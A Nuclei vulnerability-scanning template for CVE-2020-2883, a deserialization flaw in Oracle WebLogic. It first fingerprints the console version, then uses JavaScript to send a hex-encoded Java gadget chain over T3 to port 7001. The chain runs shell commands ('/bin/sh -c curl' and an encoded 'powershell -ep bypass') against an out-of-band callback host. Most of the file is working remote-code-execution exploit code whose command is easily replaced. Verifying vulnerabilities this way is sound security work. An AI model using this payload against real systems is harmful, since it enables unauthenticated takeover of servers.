Oracle WebLogic Server - Remote Code Execution

id: CVE-2020-2883

info:
  name: Oracle WebLogic Server - Remote Code Execution
  author: daffainfo
  severity: critical
  description: |
    Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization over IIOP/T3 protocols to achieve complete takeover of Oracle WebLogic Server instances.
  remediation: |
    Upgrade to Oracle WebLogic Server versions that include patches for this vulnerability as described in the Oracle April 2020 CPU.
  reference:
    - http://packetstormsecurity.com/files/157950/WebLogic-Server-Deserialization-Remote-Code-Execution.html
    - https://www.oracle.com/security-alerts/cpuapr2020.html
    - https://www.zerodayinitiative.com/advisories/ZDI-20-504/
    - https://www.zerodayinitiative.com/advisories/ZDI-20-570/
    - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/weblogic_deserialize_badattr_extcomp.rb
    - https://nvd.nist.gov/vuln/detail/CVE-2020-2883
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-2883
    cwe-id: CWE-502
    epss-score: 0.94371
    epss-percentile: 0.99965
    cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: oracle
    product: weblogic_server
    shodan-query: product:"oracle weblogic"
  tags: cve,cve2020,oracle,weblogic,javascript,rce,intrusive,kev,vkev,vuln

flow: http(1) && javascript(1)

http:
  - method: GET
    path:
      - '{{BaseURL}}/console/login/LoginForm.jsp'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(body, "10.3.6.0", "12.1.3.0", "12.2.1.3", "12.2.1.4")'
          - 'contains(body, "WebLogic Server Version:")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'WebLogic\s+Server\s+Version:\s+([0-9.]+)'
        internal: true

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      const m = require('nuclei/net');

      const command1 = "/bin/sh -c curl http://" + oast;
      const command2 = "cmd.exe /c powershell.exe -nop -ep bypass -e " + btoa("curl http://" + oast);
      const address = Host+":"+Port;
      const version = template.version;

      let conn, conn2;

      conn = m.Open('tcp', address);
      conn2 = m.Open('tcp', address);

      function extractorCompUid(versionNo) {
        switch (versionNo) {
          case '12.1.3.0.0':
            return 'c7ad6d3a676f3c18';
          case '12.2.1.3.0':
            return 'fb4ac83df1d72edc';
          default:
            return 'f9b3bc58cc52cd21';
        }
      }

      function chainedExtractorUid(versionNo) {
        switch (versionNo) {
          case '12.1.3.0.0':
            return '889f81b0945d5b7f';
          case '12.2.1.3.0':
            return '06ee10433a4cc4b4';
          default:
            return '435b250b72f63db5';
        }
      }

      function abstractExtractorUid(versionNo) {
        switch (versionNo) {
          case '12.1.3.0.0':
            return '658195303e723821';
          case '12.2.1.3.0':
            return '752289ad4d460138';
          default:
            return '9b1be18ed70100e5';
        }
      }

      function reflectionExtractorUid(versionNo) {
        switch (versionNo) {
          case '12.1.3.0.0':
            return 'ee7ae995c02fb4a2';
          case '12.2.1.3.0':
            return '87973791b26429dd';
          default:
            return '1f62f564b951b614';
        }
      }

      function reflectExtractCount(versionNo) {
        return versionNo === '12.2.1.3.0' ? '3' : '2';
      }

      function changeHandle(versionNo) {
        return versionNo === '12.2.1.3.0' ? '007e0012' : '007e0011';
      }

      function addSect(versionNo) {
        return versionNo === '12.2.1.3.0' ? '4c00116d5f657874726163746f724361636865647400124c6a6176612f6c616e672f4f626a6563743b' : '';
      }

      function addTcNull(versionNo) {
        return versionNo === '12.2.1.3.0' ? '70' : '';
      }

      function t3_send(payload_obj) {
        let request_obj = '000009f3016501ffffffffffffffff000000710000ea6000000018432ec6a2a63985b5af7d63e64383f42a6d92c9e9af0f9472027973720078720178720278700000000c00000002000000000000000000000001007070707070700000000c00000002000000000000000000000001007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000'
          + payload_obj
          + 'fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200074900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200094900056d616a6f724900056d696e6f7249000b706174636855706461746549000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870774621000000000000000000093132372e302e312e31000b75732d6c2d627265656e73a53caff10000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff0078fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c00007870771d018140128134bf427600093132372e302e312e31a53caff1000000000078'

        const newLen = (parseInt(request_obj.length / 2)).toString(16).padStart(8, '0');
        request_obj = newLen + request_obj.slice(8);

        return request_obj;
      }

      function formatPayload(payloadCmd) {
        const parts = payloadCmd.split(' ');
        const first = parts[0] || '';
        const second = parts[1] || '';
        const rest = parts.slice(2).join(' ') || '';

        return [first, second, rest].map(part => {
          const lenHex = part.length.toString(16).padStart(4, '0');
          const partHex = [...part].map(c => c.charCodeAt(0).toString(16).padStart(2, '0')).join('');
          return '74' + lenHex + partHex;
        }).join('');
      }

      function buildPayloadObj(payload_data) {
        let payload_obj = 'aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b78700000000273720030636f6d2e74616e676f736f6c2e7574696c2e636f6d70617261746f722e457874726163746f72436f6d70617261746f72'
          + extractorCompUid(version)
          + '0200014c000b6d5f657874726163746f727400224c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b78707372002c636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e436861696e6564457874726163746f72'
          + chainedExtractorUid(version)
          + '02000078720036636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374436f6d706f73697465457874726163746f72086b3d8c05690f440200015b000c6d5f61457874726163746f727400235b4c636f6d2f74616e676f736f6c2f7574696c2f56616c7565457874726163746f723b7872002d636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e4162737472616374457874726163746f72'
          + abstractExtractorUid(version)
          + '0200014900096d5f6e546172676574787000000000757200235b4c636f6d2e74616e676f736f6c2e7574696c2e56616c7565457874726163746f723b2246204735c4a0fe0200007870000000037372002f636f6d2e74616e676f736f6c2e7574696c2e657874726163746f722e5265666c656374696f6e457874726163746f72'
          + reflectionExtractorUid(version)
          + '02000'
          + reflectExtractCount(version)
          + '5b00096d5f616f506172616d7400135b4c6a6176612f6c616e672f4f626a6563743b'
          + addSect(version)
          + '4c00096d5f734d6574686f647400124c6a6176612f6c616e672f537472696e673b7871007e000900000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000787000000000'
          + addTcNull(version)
          + '7400096765744d6574686f647371007e000d000000007571'
          + changeHandle(version)
          + '00000002707571'
          + changeHandle(version)
          + '00000000'
          + addTcNull(version)
          + '740006696e766f6b657371007e000d000000007571'
          + changeHandle(version)
          + '00000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b47020000787000000003'

          // Insert payload here
          + formatPayload(payload_data)

          + addTcNull(version)
          + '74000465786563770400000003767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707400013178';

        return payload_obj;
      }

      let shake = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'

      // For linux
      conn.SendHex(shake);
      let resp = conn.RecvString();
      Export(resp);
      let linux_obj = buildPayloadObj(command1);
      linux_payload = t3_send(linux_obj);
      conn.SendHex(linux_payload);
      conn.Close();

      // For windows
      conn2.SendHex(shake);
      let resp2 = conn2.RecvString();
      Export(resp2);
      let windows_obj = buildPayloadObj(command2);
      windows_payload = t3_send(windows_obj);
      conn2.SendHex(windows_payload);
      conn2.Close();

    args:
      Host: "{{Host}}"
      Port: 7001
      oast: "{{interactsh-url}}"

    matchers:
      - type: dsl
        dsl:
          - "success == true"
          - "contains(response, 'HELO:')"
          - "contains(interactsh_protocol, 'http')"
        condition: and
# digest: 4a0a004730450221009dcf5631c2650bf6a793fbfd266e73328ee2e897ad4b149c8ee5463386edf8d80220276026c6fb83e937f13bd45811820568205512ad6919781d11e824ea2331216a:922c64590222798bb761d5b6d8e72950